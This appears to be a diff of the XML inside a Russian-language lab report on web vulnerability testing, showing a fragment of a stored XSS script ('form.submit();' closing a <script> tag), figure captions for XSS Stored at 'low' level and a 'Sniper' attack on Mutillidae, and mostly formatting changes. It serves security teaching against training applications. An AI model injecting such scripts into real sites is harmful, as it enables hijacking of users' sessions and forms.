+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>form.submit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="851"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="459BE345" wp14:editId="539FE396">
+            <wp:extent cx="5758180" cy="3086100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="27" name="Рисунок 27"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId21"/>
+                    <a:srcRect b="12275"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5758180" cy="3086100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Результат выполнения задания во вкладке </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Stored</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">на уровне </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>low</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Настро</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">йка </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Mutillidae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>результат проведения</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> атак</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> типа «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Sniper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">» в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>нём (рисун</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ок 9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D030981" wp14:editId="227EF090">
+            <wp:extent cx="5170805" cy="3387513"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="685906341" name="Рисунок 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 14"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId22">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect t="30498" b="20320"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5173226" cy="3389099"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рисунок </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – Результат </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>проведения атаки типа «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>Sniper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t>»</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2604,41 +4152,17 @@
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">с </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>дополнительными</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">методами </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>эксплуатации уязвимостей на объекте защиты информации</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> основными методами поиска уязвимостей в WEB приложениях, основанных на использовании инструментов анализа и модификации сетевого трафика.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId19"/>
+      <w:footerReference w:type="default" r:id="rId23"/>
       <w:type w:val="nextColumn"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1137" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
@@ -3816,6 +5340,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="36563A89"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C686A09A"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3CEE4107"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4B08D7CE"/>
@@ -3906,7 +5519,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4C7F7A3C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="71184246"/>
@@ -3995,7 +5608,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4D5574F6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="59AEDB08"/>
@@ -4087,7 +5700,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4DCC4E51"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8C5E59B2"/>
@@ -4173,7 +5786,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50300B1F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F7809674"/>
@@ -4262,7 +5875,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="525A050F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="020AB9E6"/>
@@ -4351,7 +5964,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5A1E6F7B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BE6E2BAA"/>
@@ -4440,7 +6053,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="769637F1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C8B2CD4C"/>
@@ -4553,7 +6166,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7BA1146F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="568EDC86"/>
@@ -4639,7 +6252,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7DD10FE2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7D76BDD6"/>
@@ -4739,10 +6352,10 @@
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="8"/>
@@ -4754,40 +6367,43 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="14">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="15">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="19">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="20">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5190,7 +6806,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00B90011"/>
+    <w:rsid w:val="004F4A3E"/>
     <w:pPr>
       <w:spacing w:after="40"/>
     </w:pPr>
